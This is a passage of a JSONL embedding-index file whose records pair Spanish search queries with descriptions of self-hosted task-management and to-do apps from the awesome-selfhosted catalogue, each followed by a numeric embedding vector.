0.02864, 0.12733, -0.02022, 0.01338, 0.13322, -0.05077, -0.09243, -0.10841, -0.08481, -0.0485, 0.032, -0.02358, 0.04225, 0.09502, 0.04199, -0.0963, -0.06182, 0.02504, -0.01564, 0.04346, 0.11399, -0.01705, 0.02881, 0.18222, -0.01459, -0.00657, -0.01692, 0.04392, 0.04453, 0.05968, 0.00083, 0.04114, 0.04497, -0.04432, 0.1196, -0.01699, 0.03182, -0.0395, -0.09784, 0.10319, 0.00101, 0.08024, -0.04694, 0.07745, 0.0867, -0.02101, 0.06007, -0.03675, -0.03333, 0.0005, 0.12457, -0.05238, 0.02107, 0.0, 0.07556, 0.0105, 6e-05, -0.03547, 0.11911, 0.05146, 0.02079, 0.02377, -0.00849, 0.05665, 0.08943, -0.02113, -0.04351, 0.04067, -0.04134, -0.02958, 0.06657, 0.0281, 0.07227, 0.06128, 0.0994, 0.04316, 0.04106, -0.05475, -0.03396, -0.09798, -0.09204, -0.03541, -0.03728, 0.03507, 0.01988, 0.01721, -0.1034, -0.03744, 0.08884, -0.03794, -0.00303, 0.10538, 0.05218, 0.11965, 0.05346, 0.02435, -0.01215, -0.07349, 0.04338, -0.04336, -0.02763, -0.10953, 0.03376, -0.07494, -0.01528, 0.05024, 0.00833, 0.00618, -0.00558, 0.01748, -0.01765, 0.04632, 0.01285, -0.01952, -0.09848, -0.08529, -0.02952, -0.0097, 0.06665, 0.07635, 0.05723, -0.02527, -0.08397, -0.04856, -0.0042, 0.07392, 0.06997, -0.01208, 0.05253, -0.03384, 0.04421, 0.04528, -0.09503, 0.00701, -0.03189, 0.00347, 0.054, 0.0503, 0.08661, 0.11474, -0.09002, -0.01539, -0.03832, 0.00716, 0.06293, -0.03747, 0.03764, -0.06909, 0.04989, 0.00423, 0.02085, -0.08583, -0.03162, 0.0198, 0.06196, 0.0412, 0.01332, 0.04249, -0.02019, 0.03266, 0.00954, -0.00205, -0.06669, 0.0281, 0.04031, -0.01283, -0.00717, 0.0395, -0.05243, 0.09705, 0.03424, -0.00932, 0.05025, -0.05132, 0.09166, 0.00493, 0.12472, 0.07148, -0.01204, 0.05511, -0.0782, -0.03389, -0.01867, 0.0262, -0.02247, -0.0078, -0.0136, 0.0483, 0.091, 0.04493, 0.02767, -0.04587, -0.05491, 0.03819, 0.03792, 0.07888, 0.03151, -0.06403, 0.03126, 0.00731, -0.00488, -0.0101, 0.03344, 0.03043, 0.0245, 0.021, 0.00549, 0.00525, 0.04828, 0.03945, 0.02413, -0.08199, -0.03399, 0.00065, -0.01019, -0.00741, -0.06597, 0.04737, 0.05526, 0.04286, -0.01728, 0.03854, -0.00337]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "que herramienta sirve para organizar tareas y planificar proyectos", "v": [0.09064, 0.14335, -0.20269, -0.24423, 0.107, -0.14075, 0.03584, 0.018, -0.03683, -0.06922, -0.12632, 0.00281, 0.11414, -0.09682, 0.07527, 0.09326, 0.14955, -0.08547, -0.00147, 0.04088, -0.11219, 0.07608, -0.07263, 0.07615, -0.10654, -0.08155, 0.09411, -0.07258, -0.1809, 0.12418, -0.02547, 0.06133, 0.10814, -0.11625, 0.04014, -0.00191, -0.04527, 0.06002, -0.08588, -0.02384, -0.11875, 0.10174, -0.08838, 0.07916, 0.05269, 0.00726, 0.01979, -0.06278, -0.01464, 0.06807, -0.04254, -0.05157, -0.05497, 0.03858, 0.03169, -0.08249, 0.07287, -0.15433, -0.08494, -0.0886, -0.08108, 0.00321, -0.022, -0.01605, 0.10048, 0.04461, -0.0477, 0.03024, -0.03789, 0.01978, -0.00539, 0.04504, 0.03513, -0.08184, 0.00897, -0.0098, 0.07926, 0.06008, -0.03097, -0.02001, 0.02307, -0.00535, -0.12123, 0.0787, -0.05444, -0.10233, -0.00024, 0.04258, 0.05784, -0.04139, -0.08269, 0.05984, -0.02755, -0.0121, 0.02454, 0.01765, 0.14885, 0.03944, 0.09116, 0.01538, 0.0508, -0.14759, -0.06323, 0.06495, -0.08273, 0.11472, 0.00199, 0.09824, -0.01312, -0.01224, -0.06695, 0.03161, 0.02628, -0.02628, -0.04072, -0.03241, -0.00821, 0.00373, 0.04151, -0.04726, 0.04454, 0.06837, 0.00845, 0.0403, 0.00394, -0.04891, 0.0452, 0.09275, 0.04772, -0.02763, 0.04597, 0.02195, -0.06279, 0.05873, -0.08074, -0.03362, 0.02591, -0.11957, 0.01577, -0.03565, -0.07903, 0.04296, -0.04343, -0.1113, 0.03247, 0.07265, 0.09138, -0.00582, 0.01206, 0.00662, 0.0501, -0.04286, 0.02461, 0.01253, -0.02198, -0.00471, -0.08535, 0.00201, -0.02661, 0.06727, -0.06057, -0.02063, 0.04812, 0.01469, 0.0263, -0.10317, 0.0522, 0.03258, 0.08323, 0.08679, 0.03337, -0.01012, 0.06006, -0.08042, -0.00106, -0.0903, 0.00817, -0.01618, 0.06092, -0.03501, -0.04696, 0.03101, -0.03541, 0.02758, 0.00451, -0.05331, 0.01251, -0.02973, -0.00753, 0.01501, -0.00779, 0.00704, 0.03461, -0.06406, 0.03905, -0.00874, -0.0473, -0.05776, 0.03666, 0.01542, 0.00305, -0.07066, 0.03167, 0.01653, -0.01313, 0.07032, -0.02401, 0.0347, 0.01267, 0.09683, 0.05869, -0.03386, 0.02322, -0.04054, -0.03751, 0.00446, -0.02593, -0.02113, 0.02534, 0.03095, -0.00566, -0.00948, -0.00597, -0.0649, 0.05754, 0.01665, 0.04085, 0.02009, 0.03759, 0.02771, 0.02352, -0.02262, 0.00292, 0.00187, 0.01614, -0.06671, 0.02753, -0.00442, -0.02532, -0.00153, 0.00539, 0.01364, 0.0053, -0.01814, -0.05895, -0.01571, 0.0012, 0.01061, -0.04767, -0.05636, -0.02862, 0.0585, 0.08203, -0.01699, 0.00302, -0.02126]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "con que puedo montar un tablero Kanban flexible", "v": [0.00685, -0.02004, -0.23256, -0.03987, -0.22003, -0.01762, 0.00912, 0.13243, -0.19434, -0.10913, 0.01703, -0.08195, 0.06931, -0.00813, 0.01914, 0.23687, -0.10043, -0.08775, 0.09594, -0.06763, 0.00271, -0.07831, -0.06642, -0.0535, 0.05012, 0.03532, -0.03843, -0.08751, -0.10588, 0.0865, 0.06346, 0.1122, 0.02754, 0.05802, 0.02497, -0.00524, -0.0083, 0.03467, -0.06549, -0.07358, 0.02443, -0.09967, -0.05133, 0.0041, -0.03606, 0.06516, 0.02949, -0.03421, -0.00647, 0.25328, 0.08664, -0.12242, 0.07253, -0.00894, -0.01253, -0.06828, 0.12337, -0.02204, -0.01733, 0.09154, 0.03132, 0.03176, 0.02518, -0.04384, 0.02981, 0.11392, -0.05347, 0.10888, -0.0863, -0.00026, -0.04639, -0.05194, 0.05901, 0.02795, -0.05388, 0.09575, 0.00709, -0.03716, 0.04781, 0.03406, -0.0078, -0.0094, -0.0348, 0.14962, -0.01674, 0.01058, 0.10334, -0.05928, 0.04107, 0.18509, 0.02472, 0.02257, 0.12497, -0.00811, -0.0377, -0.01959, -0.02999, 0.15914, -0.06338, 0.00049, -0.0476, 0.1231, -0.04727, 0.15505, 0.01983, -0.03253, -0.01355, 0.00714, 0.01813, 0.00201, 0.0278, 0.09264, -0.06129, -0.04474, 0.01548, -0.0458, -0.00037, 0.10519, -0.02647, 0.02851, 0.04574, 0.04637, 0.09188, 0.02205, 0.05652, 0.0152, 0.13389, 0.11461, -0.12461, 0.01296, 0.01463, 0.0208, -0.05741, -0.00452, 0.02794, 0.04823, 0.03132, -0.04954, 0.03014, -0.00359, -0.01494, -0.00443, 0.00862, -0.09418, -0.00351, -0.0667, 0.02302, 0.08402, -0.04218, 0.07136, -0.00833, 0.09966, 0.06768, -0.01042, -0.03527, -0.05021, 0.0505, 0.02533, -0.00428, 0.0122, 0.027, 0.04207, 0.0404, 0.09772, 0.01039, 0.06416, -0.0712, 0.0378, 0.02917, 0.00579, -0.06825, -0.01971, 0.04777, 0.05644, 0.02227, 0.00381, -0.00846, 0.04546, -0.02963, 0.03793, 1e-05, 0.00713, 0.03048, -0.00114, 0.02308, 0.03067, 0.05016, 0.01357, 0.02233, 0.02788, 0.01224, 0.04834, 0.02623, 0.00152, -0.01846, -0.01087, 0.05717, 0.00359, 0.00706, -0.00454, 0.00712, 0.01835, -0.00738, -0.05077, 0.04715, -0.03206, 0.00666, 0.09338, 0.03044, 0.03846, 0.02805, 0.02942, 0.03533, -0.02237, 0.00868, -0.00625, -0.04094, -0.00323, 0.00547, 0.0153, 0.02306, -0.02268, 0.06839, -0.02957, -0.0115, 0.03214, -0.06698, -0.02767, -0.01426, -0.00035, 0.02557, -0.01784, -0.01613, 0.00732, -0.03638, -0.00858, -0.00279, -0.01009, 0.02025, 0.01315, -0.02839, 0.0327, 0.0184, 0.00567, 0.02382, -0.04351, -0.02089, -0.01971, -0.00682, -0.09387, -0.0554, -0.06113, -0.0, -0.04964, -0.03176, 0.00272]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Amazon Lists para gestionar listas compartidas", "v": [0.05948, 0.08964, 0.0151, -0.08672, -0.076, -0.09767, -0.07527, -0.06495, -0.27172, -0.06494, -0.04032, -0.27666, -0.07638, 0.06514, 0.13166, -0.05817, 0.10268, -0.01614, 0.11177, 0.04146, 0.02047, 0.04566, -0.12181, -0.10481, 0.00067, -0.09488, 0.10509, -0.11789, -0.148, 0.08899, 0.00641, -0.08951, -0.04661, -0.01349, 0.06398, 0.0172, 0.08793, 0.06557, 0.07116, -0.06497, -0.0197, 0.10308, -0.08322, 0.04408, -0.08718, -0.042, -0.07109, 0.05839, 0.02701, 0.00029, -0.11383, 0.0609, -0.12578, -0.01103, 0.11899, 0.00877, 0.02866, -0.09227, -0.02209, 0.06477, -0.06225, -0.02542, 0.07918, 0.05344, -0.07208, 0.09766, -0.0817, 0.09797, -0.11846, 0.12066, 0.02659, -0.01164, 0.00551, -0.05241, -0.0138, 0.04059, 0.04482, 0.02905, -0.01332, 0.10751, 0.10738, -0.12736, -0.00423, 0.03496, 0.04427, -0.11035, -0.01624, -0.08756, 0.01179, -0.00892, -0.0244, -0.10572, -0.06785, 0.00563, 0.10275, -0.02377, 0.02422, 0.09999, 0.0113, 0.03041, 0.03177, 0.09524, -0.07795, 0.02397, -0.06418, 0.10232, -0.08979, 0.05039, -0.07386, -0.02555, -0.01567, -0.00126, -0.0115, 0.0782, -0.02365, 0.01292, -0.09136, 0.01931, 0.08362, 0.01232, -0.01459, 0.02859, -0.01624, -0.03276, 0.12015, 0.06214, 0.12671, 0.08737, -0.01998, 0.0619, -0.00027, 0.01701, -0.02188, -0.11303, -0.09484, -0.03179, 0.00554, 0.01121, 0.01467, -0.05585, -0.03392, 0.02725, 0.02012, -0.01259, 0.04355, -0.10964, 0.02773, -0.01357, 0.00935, 0.0131, -0.00544, -0.02455, -0.04151, 0.0956, -0.00577, 0.00356, -0.0083, -0.05635, -0.11146, 0.04243, 0.06936, -0.01762, -0.03213, 0.05388, 0.01436, 0.03106, 0.06256, 0.03433, -0.05001, 0.01604, 0.01649, 0.11733, 0.00806, -0.02647, 0.00363, -0.04217, -0.00242, -0.06302, 0.02444, 0.02567, -0.04803, 0.0184, -0.03662, 0.01274, -0.0251, -0.05226, -0.04449, -0.00012, -0.02223, 0.04149, -0.02819, -0.01362, -0.00668, -0.04964, 0.062, -0.06001, 0.00447, -0.04765, -0.04034, -0.01778, -0.06299, -0.03056, -0.01786, -0.03304, -0.02485, -0.03866, -0.02411, 0.06621, 0.03021, -0.00014, 0.00548, -0.01031, 0.05376, 0.03333, -0.06376, 0.00079, -0.02717, -0.05384, 0.02342, -0.03524, 0.02324, 0.06194, 0.04162, -0.01334, 0.02918, 0.03052, 0.03332, 0.04043, -0.02968, 0.0256, -0.004, 0.0378, 0.02171, 0.02902, 0.02571, -0.04626, 0.00933, -0.00183, 0.02967, 0.03519, 0.01368, 0.06049, -0.01067, -0.00135, -0.04446, 0.02234, -0.08227, -0.00681, -0.02868, -0.05769, -0.03814, -0.04205, 0.0126, -0.01026, 0.05333, -0.01794]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "ΒΏcon quΓ© puedo montar una lista de compras compartida para trabajar en equipo?", "v": [0.01446, 0.12186, -0.15407, -0.10823, -0.16425, -0.14171, 0.04933, 0.08269, -0.21729, -0.26647, -0.10608, -0.04209, 0.00684, 0.00177, 0.0236, 0.07095, 0.11433, 0.00603, 0.09605, -0.02418, 0.0814, -0.06222, -0.0666, -0.08825, 0.05398, -0.00131, 0.06088, -0.03263, -0.1981, 0.10117, 0.0755, 0.03143, 0.04308, 0.01251, 0.07193, -0.05669, 0.04663, 0.0238, 0.08609, -0.08064, -0.0086, 0.05134, -0.11834, -0.0854, 0.04202, 0.00425, 0.01097, -0.037, -0.04986, 0.04471, -0.01958, 0.06222, -0.05442, -0.11919, -0.04008, -0.06335, 0.1197, 0.02653, 0.06012, -0.01861, -0.02842, 0.03277, -0.04909, 0.0726, 0.00494, 0.0724, -0.09505, 0.03426, -0.05222, 0.02705, -0.09, -0.02263, -0.07743, -0.10501, -0.03582, 0.02976, 0.06719, 0.02806, -0.00021, 0.03233, 0.11671, 0.06235, -0.00364, 0.03889, 0.07239, -0.10022, -0.01073, 0.01901, 0.01551, -0.02904, 0.00729, 0.02959, -0.06285, -0.11396, 0.0044, 0.01635, 0.03476, 0.05343, -0.03506, 0.04264, -0.02619, 0.00563, 0.0002, 0.07281, -0.05498, 0.10025, 0.02609, 0.07272, -0.04768, -0.09782, 0.01474, -0.02208, -0.19351, 0.05275, -0.02455, -0.08297, -0.10944, 0.02578, -0.02737, 0.02189, -0.01548, 0.13214, 0.03574, 0.02331, 0.05156, -0.07943, 0.13217, 0.14512, -0.04433, 0.01124, -0.06238, 0.0982, -0.01065, -0.03961, -0.12887, -0.00627, 0.00595, -0.00683, -0.03475, -0.06831, 0.03133, -0.05101, -0.0456, -0.03868, -0.00063, 0.0701, 0.07179, -0.06515, -0.02229, -0.04777, 0.05172, 0.07821, 0.0338, -0.02751, -0.03364, 0.05455, 0.14548, -0.05058, 0.01671, 0.00379, 0.03204, 0.00844, -0.0408, 0.02679, 0.0096, -0.03305, 0.00208, -0.00439, 0.0598, 0.04128, -0.00723, 0.04865, 0.02341, -0.08381, 0.03918, 0.00801, -0.00436, -0.00622, -0.00469, 0.05835, -0.0281, 0.03261, 0.00018, 0.0398, 0.0365, 0.01395, 0.00601, 0.00296, -0.08654, 0.04337, -0.06236, -0.02316, 0.06504, 0.01437, 0.06488, -0.06383, 0.04992, 0.0008, -0.00231, -0.02707, 0.00761, -0.05254, 0.0447, 0.05138, 0.00919, -0.05678, -0.07832, 0.07814, 0.04472, 0.02067, 0.05355, -0.03726, 0.00621, -0.0126, -0.03333, -0.01239, -0.00637, -0.03116, -0.02076, 0.03507, 0.02374, 0.06, 0.06311, -0.03123, 0.06456, 0.01563, -0.01844, 0.03806, 0.03294, -0.00172, 0.03945, 0.00126, 0.02256, -0.03013, -0.03702, -0.0288, -0.05293, 0.07486, -0.01893, 0.03305, 0.01792, 0.03529, -0.04629, -0.04176, -0.06654, 0.00429, -0.03189, 0.01998, -0.02675, -0.03789, -0.08601, -0.0327, -0.02857, -0.0296, 0.01155, -0.01134]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "ΒΏhay alguna herramienta para gestionar mis tareas desde la lΓ­nea de comandos que sea muy rΓ‘pida y discreta?", "v": [-0.02858, 0.17745, -0.15194, -0.13784, 0.00475, -0.10534, -0.08168, 0.07435, -0.0815, 0.04077, -0.09202, -0.06085, 0.12857, -0.09974, 0.09994, 0.05625, 0.15267, -0.02481, -0.00743, -0.05988, -0.02805, -0.0066, -0.00365, -0.00957, -0.10078, -0.07954, 0.14739, -0.09972, -0.21844, 0.05254, 0.01351, 0.05923, 0.11466, -0.09379, -0.03201, 0.05794, -0.07952, -0.00014, 0.03479, 0.05359, -0.0893, 0.03848, -0.11041, 0.02795, 0.1048, -0.0445, -0.01545, -0.00936, -0.00136, 0.01319, -0.07274, -0.14472, -0.05059, 0.02923, -0.07631, -0.09351, 0.18937, -0.07984, 0.03751, -0.10003, -0.08913, -0.018, -0.01496, 0.05713, 0.01576, -0.02264, 0.00169, -0.17636, -0.11216, 0.1069, -0.02868, 0.0322, 0.00126, 0.0594, 0.10587, -0.04775, -0.02206, 0.05176, 0.09348, -0.01089, 0.05995, 0.02896, -0.06638, 0.01981, -0.11059, -0.13184, -0.02366, -0.01499, -0.02897, -0.03463, -0.00511, 0.01596, -0.09425, -0.02536, -0.02856, 0.09095, -0.00841, -0.01622, 0.0554, -0.01675, 0.09835, -0.0723, -0.14777, 0.1661, -0.01176, 0.09608, -0.02636, 0.0026, 0.01183, -0.00024, -0.00483, -0.09271, 0.04884, 0.00061, -0.02353, 0.03568, -0.02515, -0.06112, -0.00111, -0.04681, -0.03889, -0.05187, 0.04647, 0.04908, 0.06542, -0.06441, -0.03051, 0.06105, 0.09121, -0.04277, -0.04156, -0.01797, -0.02362, -0.05842, -0.00564, 0.07443, -0.00646, -0.07633, -0.03787, -0.21564, -0.03821, 0.05166, -0.02164, -0.04623, 0.04601, -0.00164, 0.0292, -0.10003, -0.02965, 0.02746, 0.09011, -0.05287, -0.06413, 0.04115, -0.01641, 0.01562, -0.01315, 0.02749, -0.07593, -0.00356, -0.04211, -0.05763, 0.04, 0.029, -0.00145, -0.0866, -0.02988, 0.04076, -0.01845, 0.05127, -0.02768, 0.01479, 0.00926, -0.0596, 0.03485, -0.10422, 0.00826, -0.00825, 0.05881, 0.00263, -0.00982, 0.02912, -0.00866, -0.02754, -0.00765, -0.05521, -0.03321, 0.03993, -0.04633, 0.05177, 0.03672, 0.02467, -0.03766, -0.06586, 0.00702, 0.01467, -0.01738, -0.04301, -0.01251, -0.02936, -0.04595, -0.03439, 0.03382, -0.01665, -0.02027, 0.04462, -0.00517, 0.02498, 0.03007, 0.03638, 0.02732, 0.01235, 0.02604, -0.01241, -0.02083, -0.0409, -0.00183, -0.03184, -0.01628, -0.01003, 0.01868, -0.00011, 0.02926, -0.01511, 0.03518, 0.02683, 0.02866, 0.02404, 0.02902, 0.03302, 0.04386, -0.003, -0.02047, -0.07212, 0.06561, -0.0292, 0.04879, -0.0155, -0.02006, -0.01324, 0.00375, 0.03482, 0.07798, -0.03741, -0.02267, -0.03805, -0.07118, 0.03104, -0.09158, -0.02508, -0.0754, -0.05785, 0.04643, -0.03071, 0.00269, -0.0369]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "ΒΏquΓ© programa sirve para aplicar el mΓ©todo Getting Things Done en un entorno web autoalojado?", "v": [-0.13969, 0.28377, -0.11249, -0.20102, -0.07092, -0.05702, -0.02779, -0.04271, -0.05523, -0.06169, -0.08309, -0.16701, -0.0063, -0.04894, 0.09509, -0.04523, 0.18447, -0.21241, 0.03576, -0.00478, -0.02631, 0.01097, -0.10628, -0.09358, -0.03939, 0.06459, 0.132, -0.03742, -0.13819, 0.11155, 0.0089, 0.02377, 0.09831, -0.05093, -0.13165, -0.11634, 0.07768, 0.08469, 0.0369, 0.07308, 0.00659, -0.01196, -0.0248, 0.04269, 0.06176, 0.08497, 0.03952, -0.01712, -0.09754, 0.05451, 0.03266, 0.08307, -0.05958, -0.03906, -0.02224, 0.00578, 0.05437, -0.10586, -0.04039, -0.01518, -0.09103, -0.02653, -0.02173, -0.02353, 0.02366, -0.09254, 0.08762, 0.12007, -0.00509, -0.02693, 0.00095, -0.15221, 0.08653, 0.03603, -0.0312, -0.00255, -0.00104, 0.0322, 0.03194, -0.04093, -0.03746, 0.05463, -0.0415, 0.02568, -0.09953, 0.02349, 0.11263, -0.11547, 0.05726, -0.1301, -0.03453, 0.06868, 0.04756, 0.03768, 0.00785, -0.06853, 0.07703, -0.0359, 0.03037, 0.033, 0.05943, -0.09518, -0.09089, 0.06624, -0.09224, 0.04088, 0.05375, 0.02893, -0.057, -0.02667, -0.07707, 0.00725, -0.08686, -0.02817, -0.09206, 0.0344, 0.07533, 0.02945, -0.03687, -0.0804, -0.07542, 0.06752, -0.09855, -0.00742, 0.0311, -0.0054, 0.03022, 0.09145, -0.02904, 0.04937, 0.0411, -0.06594, -0.04952, 0.03869, -0.02744, -0.02037, 0.05763, -0.04203, 0.04515, -0.01602, 0.07592, 0.02204, -0.01567, 0.00173, 0.02444, -0.02124, 0.05209, -0.03513, 0.01389, 0.05423, 0.00123, -0.02492, -0.02146, -0.0033, -0.07304, -0.19296, 0.04483, -0.02179, -0.02103, 0.02722, -0.02108, 0.01427, 0.0458, 0.0024, 0.01693, -0.00804, 0.01325, -0.0065, -0.01446, 0.04823, 0.00726, 0.05056, -0.0052, -0.04915, -0.0354, 0.02108, 0.0416, -0.04781, 0.00149, 0.02586, -0.0628, -0.00455, 0.07029, 0.03508, 0.06003, 0.00369, 0.02987, 0.06293, -0.03193, 0.00726, -0.09158, -0.00088, 0.00711, -0.03048, 0.01294, 0.04425, -0.00661, -0.01555, 0.03644, -0.00632, -0.04801, -0.05502, 0.05451, -0.02179, -0.02556, 0.08979, -0.02302, -0.03014, -0.01392, 0.08819, -0.02075, -0.00886, 0.0556, 0.04173, -0.04773, 0.01887, -0.06696, 0.02043, -0.02807, 0.0219, 0.04884, -0.03948, -0.0438, 0.0318, -0.05443, -0.03728, 0.01465, 0.03384, -0.00101, -0.00017, 0.00247, -0.13839, -0.00966, 0.03155, -0.00869, -0.00501, -0.04374, -0.0336, -0.037, -0.04319, -0.00372, 0.0241, 0.04196, -0.0271, 0.0084, 0.00625, 0.02882, -0.00704, 0.02518, -0.03129, -0.01873, -0.03158, 0.01975, 0.03451, -0.02549, 0.03623]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "que programa hay para gestionar tareas con estructura jerΓ‘rquica y sincronizaciΓ³n Telegram?", "v": [-0.17818, -0.04319, -0.09802, -0.19687, 0.11652, -0.05036, 0.01907, 0.18784, 0.03099, 0.03901, -0.14392, -0.00395, 0.12923, -0.08416, 0.10857, 0.06307, 0.01677, -0.12763, 0.10633, 0.06559, -0.02858, 0.09926, 0.04885, -0.00797, -0.04888, -0.05702, -0.08443, -0.16142, -0.06155, 0.01184, 0.06558, -0.04593, 0.16665, -0.16605, 0.1063, 0.12677, 0.01123, 0.01861, -0.07615, 0.08345, -0.08178, 0.05579, -0.02165, 0.0385, 0.04353, 0.08328, 0.14097, -0.09444, -0.00409, -0.06761, -0.05814, -0.00892, 0.02314, 0.0566, 0.00471, -0.02522, 0.05137, -0.15984, 0.0106, -0.06638, -0.01557, 0.10277, 0.04594, -0.02124, 0.07731, 0.03161, 0.0296, 0.04961, 0.02374, 0.12137, 0.08038, 0.02711, -0.0513, 0.03949, 0.01616, 0.11032, -0.03893, 0.06132, -0.02201, 0.049, 